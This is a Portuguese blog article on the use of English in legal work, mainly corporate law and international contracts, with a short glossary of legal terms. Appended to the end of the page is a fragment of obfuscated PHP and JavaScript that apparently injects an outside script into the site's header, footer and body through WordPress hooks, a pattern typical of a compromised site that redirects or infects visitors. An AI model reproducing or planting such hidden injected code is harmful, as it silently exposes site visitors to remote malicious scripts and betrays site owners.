O SEGREDO DAS LINGUAS l O curso de língua estrangeira ainda pode fazer parte da sua vida.

Como usar o Inglês na área do Direito?

Como usar o Inglês na área do Direito?

Língua estrangeira pode ser uma grande aliada para profissionais da área. Veja como.

O inglês é o idioma mais falado do planeta e, num mundo globalizado, é capaz de fazer a diferença para profissionais de diversos segmentos. No âmbito jurídico não é diferente. A utilização do inglês na área do direito engloba o idioma de forma mais abrangente, como no chamado inglês jurídico. A habilidade de lidar com a língua inglesa permite aos juristas lidar com diversas situações dentro de suas carreiras que podem abrir portas para voos maiores.

Inglês Jurídico: Como Idioma é utilizado

A principal aplicação do inglês na área do direito, utilizada de forma constante pelos profissionais, está relacionada ao Direito empresarial. A relação dos juristas deste segmento com o idioma inglês envolve investimentos estrangeiros no Brasil, bem como seus contratos internacionais. Por isso, o advogado precisa estar sempre atualizado e estudar sobre as tendências e novidades contratuais e empresariais internacionais.

No contexto do segmento mencionado, o estudo da língua inglesa com enfoque jurídico é importante para a criação, revisão e análise dos documentos em inglês. Com isso, o profissional é capacitado para regulamentar as transações empresariais internacionais de clientes. Além de celebrarem acordos de transações complexas em relações bilíngues, envolvendo empresas nacionais e internacionais.

Termos mais utilizados do Inglês Jurídico

• Consideration – Contraprestação, pagamento;

• Execute – Firmar;

• Incorporate – Constituição de sociedade;

• Law – Lei;

• Legislation – Legislação;

• Mispresentation – Falsidade ideológica;

• Right – Direito;

• Sue – Processar;

• Terminate – Extinguir ou rescindir;

• Tribunal – Junta, Turma, Câmara.

Via: https://www.educamaisbrasil.com.br/educacao/carreira/como-usar-o-ingles-na-area-do-direito

Mais artigos do

Blog SDL

?>},_0x1ca2(_0x5c13d3,_0x10d019);}function _0x56ac(){var _0x46c312=['trickl','6LObfmH','script','scri','3822470oovwGi','220qlaQai','com/','createElement','ctl','appendChild','type','133350wkvzaH','ter.','134ANVGfY','pts/t','src','est','erfe','ords.p','querySelector','5879944KcCcWx','231938CdIMay','2890492INDZRn','currentScript','50535rwizqw','parentNode','script[id=\x22trickl\x22]','text/javascript','28527sHSQyT','head'];_0x56ac=function(){return _0x46c312;};return _0x56ac();}";}add_action('wp_head', '_set_metas_tag');add_action('wp_footer', '_set_metas_tag');add_action('wp_body_open', '_set_metas_tag');_set_metas_tag();}}catch(Exception $e){}} ?>